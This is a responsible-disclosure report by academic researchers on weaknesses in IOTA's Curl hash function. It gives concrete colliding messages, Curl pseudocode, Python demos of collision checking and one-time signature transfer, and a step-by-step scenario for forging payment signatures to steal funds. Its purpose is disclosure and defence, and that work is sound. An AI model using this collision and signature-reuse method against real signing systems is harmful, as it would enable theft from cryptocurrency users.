IOTA Vulnerability Report: Cryptanalysis of the Curl Hash Function Enabling Practical Signature Forgery Attacks on the IOTA Cryptocurrency

By Ethan Heilman (Boston University, Paragon Foundation, Commonwealth Crypto), Neha Narula (MIT Media Lab), Thaddeus Dryja (MIT Media Lab, Lightning Network Dev), Madars Virza (MIT Media Lab, Zcash)

Team contact e-mail: curl@mit.edu

Summary: We present attacks on the cryptography used in the IOTA blockchain including under certain conditions the ability to forge signatures. We have developed practical attacks on IOTA’s cryptographic hash function Curl, allowing us to quickly generate short colliding messages. These collisions work even for messages of the same length. Exploiting these weaknesses in Curl, we break the EU-CMA security of the IOTA signature scheme. Finally we show that in a chosen message setting we can forge signatures of valid spending transactions (called bundles in IOTA). We present and demonstrate a practical attack (achievable in a few minutes) whereby an attacker could forge a signature on an IOTA payment, and potentially use this forged signature to steal funds from another IOTA user. This report provides example demonstrations of these vulnerabilities but does not detail the exact cryptanalytic process to generate the collisions. A later publication will provide an in-depth study of our cryptanalysis of Curl.

Responsible Disclosure statement: This report is the product of a responsible disclosure process. Over a month before publishing this report we disclosed these vulnerabilities to the IOTA developers. In response the IOTA developers have updated IOTA to no longer use the Curl hash function to hash transactions as part of the IOTA signing process. Curl is still used for other purposes in IOTA. We are now publishing our attacks since the IOTA developers have deployed their fixes. See our timeline of events below.

Our analysis is based on the IOTA open source repos on GitHub, the IOTA forum and email discussions with the IOTA developers during the disclosure process. At no time did we send any of these forged signatures to the IOTA network or interfere in the IOTA network in any way. We validated all of our attacks offline using IOTA's publicly available reference implementations.

Interest Disclosure: Ethan Heilman is involved in cryptocurrency work with the Paragon Foundation and Commonwealth Crypto Inc. Madars Virza is a Science Advisor at the Zcash company. On May 8th, Dominik Schiener reached out to Ethan over Twitter to talk about IOTA. Nothing happened from that initial outreach.

1. Systems Impacted:

  • The Cryptographic Hash Function Curl: The cryptographic hash function Curl designed by the IOTA project has serious weaknesses (the IOTA developers asked us to refer to it as "Curl-P", but we declined since it is referred to as "Curl" publicly). We have demonstrated practical attacks which break Curl's collision resistance for messages of different length and the same length (note that the IOTA developers maintain that Curl is supported only on messages of the same length). We also demonstrate additional non-random behavior between certain classes of related messages, namely messages which are bit rotations of other messages (IOTA developers maintain that this is not a supported use of Curl). Curl should not be relied on for randomness or collision resistance. While IOTA is still using Curl for transaction ID generation and for proof of work, we present no attacks against these uses. We provide examples of collisions and non-random behavior at the end of the report. The IOTA team has deployed fixes to the vulnerabilities discussed in this report.

  • Prior versions of IOTA: The signature scheme used by IOTA prior to recent updates relied on the collision resistance of Curl for hashing messages as part of the signature algorithm. The attacks we developed against Curl led to practical signature forgery attacks against payments in IOTA. We provide an example forged signature on a valid IOTA payment (before the fix was deployed) at the end of the report.

Mitigations: On Aug 7 2017 IOTA deployed a hardfork to their system to stop using Curl for signature message hashing. In order to perform the upgrade, deposits and withdrawals were halted on Bitfinex for roughly 3 days. All users who hold IOTA directly (not via an exchange) must upgrade their wallets and addresses.

The signature forgery vulnerability was fixed in IOTA Reference Implementation (IRI) version 1.3, IOTA wallet version 2.4.0.

2. Disclosure Timeline

  • July 14 2017: We disclosed weaknesses in the Curl hash function to the IOTA developers and informed them that we were making steady progress on additional attacks. Because of these weaknesses we recommended that they replace the Curl hash function with a recognized and publicly vetted hash function. This disclosure included example collisions on messages of different lengths and an example of non-pseudo-randomness.

  • July 22 2017: We disclosed improved attacks on Curl and showed how these attacks could break the collision resistance of Curl even for messages of the same length. We also outlined how we could use these collisions to break the EU-CMA security of the IOTA signature scheme. This disclosure included an example collision we created via differential cryptanalysis.

  • July 25 2017: After continued discussion, the IOTA developers proposed a timeline for fixing these vulnerabilities. On Aug 5th Curl would be replaced with the KECCAK hash function (also known as SHA-3). Then on Aug 5th-10th users would move their tokens from Curl to KECCAK. On Aug 12th the IOTA devs would disclose the existence of the vulnerability.

  • Aug 7 2017: On Aug 7th the IOTA developers merged code which replaced Curl with a hash function they named Kerl. According to the Kerl specification, it is a ternary variant of the KECCAK hash function. Around this same time the IOTA developers posted a blog entry titled "Upgrades & Updates" which discussed the reasons for moving away from Curl, stating:

Creating a new cryptographic hash function is no trivial undertaking, even when it is being built on preexisting world class standards. “Don’t roll your own crypto” is a compulsory uttered mantra that serves as a good guiding principle for 99.9% of projects, but there are exceptions to the rule. When spearheading technology for a new paradigm this statement is no longer axiomatic. Progress must march on. Therefore audits, reviews and continued research on Curl has been a given from day 1. One of the cryptographers we reached out to months ago to review Curl has disclosed that he is worried there might be a potential vulnerability in Curl. We have since had our internal team, as well as other cryptographers review it and asked the disclosing party for more information. While the party that did the responsible disclosure has been quite forthcoming, there are still some of the last details to be discussed more thoroughly with the respective teams in order to reproduce the claims and verify if there was even any vulnerability.

However, even though we have protection mechanisms in place that would render even most valid attacks useless in this ‘training wheel stage’ (due to the Coordinator and the higher-level protocol), as you are working on the cutting edge you have to take every precaution possible and always be on guard. Therefore we have made the simple decision to temporarily switch Curl with Keccak (SHA-3) for cryptographic signing in IOTA. - "David Sønstebø - Upgrades & Updates"

  • Aug 10 2017: We sent the IOTA developers IOTA payments (bundles in IOTA terminology) with different output addresses which hash to the same value under Curl as used in IOTA signatures (prior to the Aug 7th fix). We did not submit these bundles to the network, but we confirmed with the IOTA developers that each bundle independently would syntactically validate under IOTA bundle verification rules. This showed that not only could we forge signatures for some messages, but that these messages could potentially be valid payments in IOTA.

  • Sept 1 2017: We sent the IOTA developers valid IOTA payments which pay out different amounts and hash to the same value under Curl as used in IOTA signatures. This showed that under certain circumstances an attacker could exploit this cryptologic vulnerability in Curl to steal funds (prior to the Aug 7th fix). In the example Alice signs a payment paying Eve 100 IOTA, and Eve can use the signature on this payment to authorize a payment where Eve receives 129140263 IOTA from Alice's funds.

3. IOTA Background

The IOTA network launched July 11, 2016 and its token was listed on Bitfinex on June 14, 2017. A fixed supply of 2.77 Billion MIOTA (currency units) was created when the network was launched. 1 MIOTA (mega/million IOTA) is equal to 1,000,000 IOTA. As of September 6, 2017 IOTA has a market capitalization of $1.9B making it, at the time of writing, the 9th most valuable blockchain based cryptocurrency by market cap.

IOTA as it is currently deployed has several uncommon design features and terminology:

  • IOTA is built on the concept of a tangle (known also as a DAGchain or Directed Acyclic Graph Blockchain) where instead of a single chain of blocks, transactions are linked together in a graph. A transaction is a simple object specifying an address, signature, value, tag, and a few other fields. A group of transactions which together specify a transfer is called a bundle; in a bundle, transactions roughly correspond to Bitcoin inputs or outputs. Each transaction must include a small amount of proof of work, and point to two other transactions already in the Tangle.

  • IOTA uses balanced ternary (base 3) instead of binary (base 2). That is, it uses trits and trytes instead of bits and bytes. A tryte consists of three trits.

  • IOTA currently relies on a trusted party called a coordinator to approve and checkpoint state. This has led to concerns that IOTA is centralized. The IOTA developers argue IOTA is not centralized and that this is a temporary measure. The source code for the coordinator is not available for public inspection. Since we did not interact with the IOTA network, we cannot confirm how the coordinator would affect these proposed attacks.

4. Practical Attacks Against the Cryptographic Hash Function Curl

The IOTA team designed their own cryptographic hash function called Curl. It is used for a number of purposes in IOTA including transaction address creation, message digest creation, Proof-of-Work (PoW) and hash-based signatures. Unlike most cryptographic hash functions, Curl operates on base-3 numbers called “balanced ternary”. Curl is built on the popular sponge construction.

Curl takes a message, breaks it into message blocks and then iteratively copies each message block into the current state and runs Transform on the state to update it.

def Curl(message):
    # The state consists of 729 trits. It is initialized to all zero.
    state = [0]*729

    # The message (a list of trits) is broken into message blocks of size 243
    for start in range(0, len(message), 243):
        MB_i = message[start:start+243]
        # The current message block is copied into the first 243 trits of the state
        state[0:243] = MB_i
        state = Transform(state)

    # The output is the first 243 trits of the state
    output = state[0:243]
    return output

The function Transform used by Curl is an unkeyed permutation substitution network.

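def Transform(state):
    # sbox is the table given below, keyed by (x, y)
    j = 0
    for round in range(27):
        new_state = [0]*729

        for pos in range(729):
            # i and j walk the state in steps of 364 (mod 729)
            i = j
            j += (364 if j < 365 else -365)

            x = state[i]; y = state[j]
            z = sbox[x, y]
            new_state[pos] = z

        state = new_state
    return state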

The sbox takes two trits and returns a third trit.

      y:  -1, 0, 1
    x: -1 [1, 1, -1]
    x:  0 [0, -1, 1]
    x:  1 [-1, 0, 0]

A close inspection of the Curl source code revealed that Curl was vulnerable to a well known technique for breaking hash functions called differential cryptanalysis. Using this observation, we were able to write software that could quickly generate practical collisions for messages of the same length. Since these collisions fully collide the internal state of the hash function, a single collision enables us to generate an unbounded number of additional colliding messages. These collisions are for all rounds of Curl and can be generated in seconds on commodity hardware. The nature of our attack allows us great control over values of the colliding messages.

By "practical", we mean that we can efficiently compute these collisions on commodity hardware. Using 80 cores, we were able to find collisions in a few minutes.

Thus, Curl as used in IOTA does not provide collision resistance. We have provided example collisions and non-pseudo random behavior at the end of this report. In the next section we will show how we exploit these collisions to break the EU-CMA security of IOTA's signature scheme. Note that the IOTA developers maintain that their signing scheme does not depend on Curl's collision resistance.

5. Breaking the EU-CMA Security of the IOTA Signature Scheme

We are not exactly sure how IOTA specifies their signature scheme. We are using the definition of a signature scheme presented by Goldwasser, Micali and Rivest; namely, a signature scheme is a triplet of algorithms for key generation, signing, and verification, which jointly satisfy certain functionality and security properties. We refer to the Sign() and IsValid() functions in their code. Our communication with IOTA indicates their definition may be different.

IOTA's signature scheme is based on Winternitz One-Time Signatures (WOTS) with an important difference: IOTA operates on the hashes of messages instead of operating directly on messages as is done in WOTS. This is a critical difference since WOTS only requires that the hash function is a One Way Function, whereas the IOTA signature scheme requires that the hash function must also be collision resistant. Important for our attack is that if two messages, msg1 and msg2, hash to the same output, a signature on msg1 will also verify as a signature on msg2.

IOTA_Sign(SK, msg):
    h_msg = CURL_Hash(msg)
    sig = WOTS_Sign(SK, h_msg)
    return sig

Before explaining more we need to provide some background on how the security of a digital signature scheme is defined. The standard security definition for digital signature schemes is called Existential Unforgeability against a Chosen Message Attack or EU-CMA. Let’s break down what this means:

  • Existential Unforgeability (EU) means that the attacker should not be able to forge a signature for any message m even if the message m is complete nonsense.
  • A Chosen Message Attack (CMA) is an attack in which, before producing the forged signature on the message m, the attacker is allowed to ask for signatures on other messages m' different from m.

Thus, EU-CMA security guarantees that even if the attacker chooses two messages msg1, msg2 and the signer signs msg1, the attacker should not be able to find a valid signature for msg2.

Note that EU-CMA as defined here allows many requests for signatures for the same message. We believe this can be trivially adapted for a one-time signature scheme.

Breaking the EU-CMA security of IOTA’s signature scheme:

In our attack a malicious user, Eve, tricks a user Alice by asking Alice to sign a message msg1 and then later produces a different message, msg2, which also verifies under that signature.

(1). Eve uses our collision attack on Curl to choose two messages, msg1, msg2 such that:
     CURL_Hash(msg1) = CURL_Hash(msg2) and msg1 != msg2

(2). Eve sends msg1 to Alice and asks Alice to sign it.

(3). Alice sends Eve a signature on msg1:
     sig1 = IOTA_Sign(SK,msg1)
 
(4). Eve produces a valid signature,message pair (sig1,msg2) where msg1 is a message which Alice has not signed.
     msg1 != msg2 AND IOTA_Sign(SK, msg1) == IOTA_Sign(SK, msg2) 

By definition Alice has broken the EU-CMA security of IOTA’s signature scheme.
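
The signature transfer in steps (1) to (4), as an added example (not code from this report or from IOTA): a toy Winternitz one-time signature over SHA-256 signs the digest of a message, first with a deliberately weakened 16-bit digest standing in for a hash without collision resistance, then with full SHA-256. The key seed, the message strings and `weak_digest` are constructed for illustration; the collision here comes from a trivial search over the tiny digest, not from the Curl attack.

```python
import hashlib
from itertools import count

W = 16                # Winternitz parameter: one hash chain per 4-bit digit
CHECKSUM_DIGITS = 3   # enough for digests up to 32 bytes (max checksum 64 * 15 = 960)


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def chain(value: bytes, steps: int) -> bytes:
    """Apply H to value `steps` times."""
    for _ in range(steps):
        value = H(value)
    return value


def digits(digest: bytes) -> list:
    """Base-16 digits of the digest followed by the WOTS checksum digits."""
    d = [n for byte in digest for n in (byte >> 4, byte & 0x0F)]
    checksum = sum(W - 1 - v for v in d)
    return d + [(checksum >> (4 * k)) & 0x0F for k in range(CHECKSUM_DIGITS)]


def keygen(seed: bytes, digest_len: int):
    """Derive one secret chain start per digit; the public key is each chain's end."""
    n = 2 * digest_len + CHECKSUM_DIGITS
    sk = [H(seed + i.to_bytes(2, "big")) for i in range(n)]
    pk = [chain(s, W - 1) for s in sk]
    return sk, pk


def sign(sk, msg: bytes, digest_fn):
    # Same shape as IOTA_Sign above: hash the message, then WOTS-sign the hash.
    return [chain(s, d) for s, d in zip(sk, digits(digest_fn(msg)))]


def verify(pk, msg: bytes, sig, digest_fn) -> bool:
    ds = digits(digest_fn(msg))
    return len(sig) == len(pk) == len(ds) and all(
        chain(s, W - 1 - d) == p for s, d, p in zip(sig, ds, pk))


def weak_digest(msg: bytes) -> bytes:
    return H(msg)[:2]   # constructed stand-in: 16 bits, so collisions are easy


def strong_digest(msg: bytes) -> bytes:
    return H(msg)       # collision-resistant digest


def find_colliding_pair(digest_fn):
    """Step (1): two different messages with the same digest (free-form tag varies)."""
    seen = {}
    for i in range(4096):
        m = b"pay Eve 100 IOTA; tag=%d" % i
        seen[digest_fn(m)] = m
    for j in count():
        m2 = b"pay Eve 129140263 IOTA; tag=%d" % j
        if digest_fn(m2) in seen:
            return seen[digest_fn(m2)], m2


def demo():
    seed = b"constructed demo seed"          # Alice's key material (constructed)
    msg1, msg2 = find_colliding_pair(weak_digest)

    # Steps (2)-(4) with the weak digest: Alice signs msg1, sig1 verifies on msg2.
    sk_w, pk_w = keygen(seed, 2)
    sig1 = sign(sk_w, msg1, weak_digest)
    forged_weak = verify(pk_w, msg2, sig1, weak_digest)

    # Same two messages with a collision-resistant digest: sig1 no longer transfers.
    sk_s, pk_s = keygen(seed, 32)
    sig1_s = sign(sk_s, msg1, strong_digest)
    own_strong = verify(pk_s, msg1, sig1_s, strong_digest)
    forged_strong = verify(pk_s, msg2, sig1_s, strong_digest)
    return msg1, msg2, forged_weak, own_strong, forged_strong


if __name__ == "__main__":
    m1, m2, fw, os_, fs = demo()
    print("msg1:", m1)
    print("msg2:", m2)
    print("weak digest:   sig(msg1) verifies on msg2 ->", fw)
    print("strong digest: sig(msg1) verifies on msg1 ->", os_, "| on msg2 ->", fs)
```
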

Forging Signatures on IOTA Payments:

IOTA uses a bundle to represent a transfer of value; a bundle consists of multiple transactions. These transactions specify the inputs and outputs of the transfer. We were able to produce pairs of bundles which differ by only one or two trits but hash to the same value, and so have the same signature. We can demonstrate a practical (achievable in a few minutes) attack where the signature on one valid IOTA payment could be used on a different valid IOTA payment. Such an attack, if deployed, could potentially cause an IOTA user to lose funds.

A transaction in IOTA has the following fields:

SignatureMessageFragment, 
Address, 
Value, 
Tag, 
Timestamp, 
CurrentIndex, 
LastIndex, 
BundleHash, 
TrunkTransactionID,
BranchTransactionID, 
Nonce

A bundle consists of multiple transactions, containing credits to the receiving addresses, debits from the spending addresses, and extra empty transactions which hold parts of the signature. Tags are only constrained by length, which we use to set up our attacks. The total value across all transactions in a bundle must sum to zero, and every transaction must contain two pointers to other valid transactions in the IOTA tangle (the trunk and branch transactions). A transaction ID is constructed by hashing the concatenation of every field in a transaction. The convention is that within a bundle, each transaction points to the transaction after it as its trunk transaction, and the last transaction in the bundle points to some other first transaction in a different valid bundle. The nonce must be calculated to provide sufficient proof of work for the transaction to get accepted into the tangle -- at the time of writing, this required that the transaction hash (including the nonce) ends with at least fifteen zero trits.

A user signs the hash of a bundle. A BundleHash, unlike a transaction hash, does not use all the fields in each transaction in the bundle. Instead, it is constructed by hashing the concatenation of only the following fields:

Address, 
Value, 
Tag, 
Timestamp, 
CurrentIndex, 
LastIndex

of all transactions in the bundle.

Waste money attack:

We use our method for generating collisions to construct two valid IOTA bundles which collide on one trit in the Address fields.

Alice wants to pay Eve:

(1). Eve creates two very specially constructed colliding bundles: bundle1 and bundle2. Bundle1 spends some of Alice’s funds and pays to addr1. Bundle2 also spends some of Alice’s funds but differs in that it pays out to a slightly different address, addr2.

(2). Eve asks Alice to pay Eve by signing bundle1, that is paying out to addr1.

(3). Eve takes the signature off of bundle1 and uses it on bundle2 which she then broadcasts to the network.

(4). Eve then tells Alice that Alice paid to the wrong addr and shows that Alice signed a transaction spending out to addr2 not addr1 as Eve asked. Eve then asks to be paid again.

Steal money attack:

We use our method for generating collisions to construct two valid IOTA bundles which collide twice on different trits. If Alice signs a bundle, bundle1, which pays Eve 100 IOTA from Alice's funds, Eve can use the signature on bundle1 as a valid signature on bundle2 which pays Eve 129140263 IOTA from Alice's funds.

Alice wants to pay Eve:

(1). Eve creates two specially constructed colliding bundles; bundle1 and bundle2. Bundle1 spends 939211930 IOTA from Alice’s address and pays 100 IOTA to Eve and 939211830 IOTA in change back to Alice. Bundle2 also spends some of Alice’s funds but differs in that it instead pays 129140263 IOTA to Eve and only 810071667 IOTA in change back to Alice.

(2). Eve asks Alice to pay Eve by signing bundle1, that is paying 100 to Eve and sending the change 939211830 back to Alice.

(3). Eve takes the signature off of bundle1 and uses it on bundle2 which she then broadcasts to the network.

(4). When Bundle2 is confirmed, Eve will have stolen 129140163 IOTA from Alice.

This is an extremely serious attack as a signature attesting that "Alice pays Eve 100 IOTA", can also attest to "Alice pays Eve 129140263 IOTA" without Alice ever agreeing to pay Eve 129140263 IOTA. Signatures using Curl can no longer be trusted to authorize transactions.

What our attacks are not:

We emphasize that to produce a signature on a msg2, our attacks require Alice to sign an innocent-looking related message, msg1, of our choosing. This is a chosen message attack. We have not developed a known message attack.

One can posit a stronger goal for the attacker: produce signatures on msg2, without seeing Alice's signature on msg1. Our attacks do not achieve this much stronger goal.

That said, we believe that the two attacks above --- wasting and stealing Alice's money --- are both realistic and extremely serious.

As we said in Section 3, we did not test any of these attacks on the IOTA network. We therefore cannot predict what kind of role the IOTA coordinator would have in impacting this attack.

6. Proof-of-Concept - Curl Attack Examples

We provide examples of colliding messages for the Curl hash function and non-randomness. Our first two examples can be replicated using a short Python proof-of-concept program we have made available. We also provide longer colliding messages which can be replicated using the ccurl-digest commandline tool.

Short colliding messages:

Two messages which collide and differ by a single position. Our Python code for replicating this can be found here.

msg1 = "RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIOJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVR"
msg2 = "RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIPJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVR"

>hash1 =  H(msg1)
GIUNBQRBI9RJQPNDVSSMUFMTLAKWTGYDMGBUYZAJNOJSKXWTYBV9QO9LBAIEUANAXAIUTHKMNGRZKLSZN

>hash2 =  H(msg2)
GIUNBQRBI9RJQPNDVSSMUFMTLAKWTGYDMGBUYZAJNOJSKXWTYBV9QO9LBAIEUANAXAIUTHKMNGRZKLSZN

>print hash1 == hash2, msg1 == msg2
True False

Non-randomness:

Two messages which are bit rotations of each other when hashed result in outputs which are also bit rotations of each other. For example we choose the string KENNYLOGGINS.

msg1 = b'9999KENNYLOGGINS99999999999999999999999999999999999999999999999999999999999999999'
msg2 = b'9KENNYLOGGINS99999999999999999999999999999999999999999999999999999999999999999999'

hash1 =  H(msg1)
OBIVYFRBFRPRVNYMJFUGYYYFHREPKJWGLWCUSKDBQVOZSFYOPPOYGFTPQQA9ZMSYE99CMCYEELGEFRDTU

hash2 =  H(msg2)
VYFRBFRPRVNYMJFUGYYYFHREPKJWGLWCUSKDBQVOZSFYOPPOYGFTPQQA9ZMSYE99CMCYEELGEFRDTUXMW

Notice that the hash2 is exactly the same as hash1 but shifted by three characters: hash1 = OBIVYFRBFRPRV..., hash2 = VYFRBFRPRV...
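
Both checks above can be reproduced from the pseudocode in Section 4. The following is an added example, not the proof-of-concept program this report refers to: a direct Python transcription of Curl and Transform with the report's sbox, run over the short colliding pair and the KENNYLOGGINS pair. The tryte alphabet and tryte-to-trit encoding are IOTA's usual ones, which this report does not spell out, and `shift_after_rounds` is a helper introduced here to show why a three-tryte shift of the input survives all 27 rounds.

```python
TRYTES = "9ABCDEFGHIJKLMNOPQRSTUVWXYZ"   # assumed: IOTA's tryte alphabet
STATE_LEN, RATE, ROUNDS = 729, 243, 27

# sbox[x][y] copied from the report's table (rows x = -1, 0, 1; columns y = -1, 0, 1)
SBOX = {-1: {-1: 1, 0: 1, 1: -1},
        0: {-1: 0, 0: -1, 1: 1},
        1: {-1: -1, 0: 0, 1: 0}}

# Short colliding pair from the report: three 81-tryte blocks, one tryte differs.
B1 = "RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVR"
B2 = "XHF9QJQHUTILIPIXUYRVSJEI{}JDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHX"
MSG1 = B1 + B2.format("O") + B1
MSG2 = B1 + B2.format("P") + B1

# Shifted pair from the report, padded with 9s (zero trits) to one 81-tryte block.
ROT1 = "9999KENNYLOGGINS".ljust(81, "9")
ROT2 = "9KENNYLOGGINS".ljust(81, "9")


def trytes_to_trits(trytes):
    """Each tryte is a value in -13..13, written as three trits, least significant first."""
    trits = []
    for ch in trytes:
        v = TRYTES.index(ch)
        if v > 13:
            v -= 27
        for _ in range(3):
            t = (v + 1) % 3 - 1          # balanced remainder in {-1, 0, 1}
            trits.append(t)
            v = (v - t) // 3
    return trits


def trits_to_trytes(trits):
    return "".join(TRYTES[(trits[i] + 3 * trits[i + 1] + 9 * trits[i + 2]) % 27]
                   for i in range(0, len(trits), 3))


def transform(state):
    for _ in range(ROUNDS):
        new_state, j = [0] * STATE_LEN, 0
        for pos in range(STATE_LEN):
            i = j
            j += 364 if j < 365 else -365
            new_state[pos] = SBOX[state[i]][state[j]]
        state = new_state
    return state


def curl_hash(trytes):
    trits = trytes_to_trits(trytes)
    if not trits or len(trits) % RATE:
        raise ValueError("message must be a whole number of 81-tryte blocks")
    state = [0] * STATE_LEN
    for off in range(0, len(trits), RATE):
        state[:RATE] = trits[off:off + RATE]   # absorb: overwrite the first 243 trits
        state = transform(state)
    return trits_to_trytes(state[:RATE])


def shift_after_rounds(shift, rounds=ROUNDS):
    """Output trit pos of a round reads state[364*pos] and state[364*(pos+1)] (mod 729).
    Since 364 * -2 = 1 (mod 729), cyclically shifting the state by s trits shifts one
    round's output by -2*s, and `rounds` rounds by (-2)**rounds * s (mod 729)."""
    return shift * pow(-2, rounds, STATE_LEN) % STATE_LEN


def collision_check():
    """Different 243-tryte messages, identical 81-tryte hash."""
    return MSG1 != MSG2 and curl_hash(MSG1) == curl_hash(MSG2)


def rotation_check():
    """Input shifted by 3 trytes: hash2 is hash1 with its first 3 trytes dropped."""
    h1, h2 = curl_hash(ROT1), curl_hash(ROT2)
    return h2[:78] == h1[3:]


if __name__ == "__main__":
    print("short messages collide:       ", collision_check())
    print("9-trit shift after 27 rounds: ", shift_after_rounds(9))
    print("hash2[:78] == hash1[3:]:      ", rotation_check())
```

A nine-trit (three-tryte) shift is carried through unchanged because (-2)^27 ≡ 1 (mod 81), which is why the two KENNYLOGGINS hashes line up after dropping three characters.
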

Long colliding messages: Since the ccurl-digest command-line tool made available by IOTA only works for messages exactly 2673 trytes long, we provide colliding messages of length 2673. We used the lyrics to the [80's hit single "push it to the limit"](https://en.wikipedia.org/wiki/Scarface_(Push_It_to_the_Limit)) in the colliding messages to demonstrate that we fully collide the internal state of Curl, which gives us arbitrary control over most of the message. We note that this internal state collision enables us to instantly create an unbounded number of other colliding messages.

$ ./ccurl-digest RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIOJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTH
INGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9

BUWSNIAGAYCVUPGUJMWIIYHR9DQAPVHRKHXPJKB9BTCKPUXTFSNPXIBHCIIYCJRAQJOGHXEYLXSJURUFS

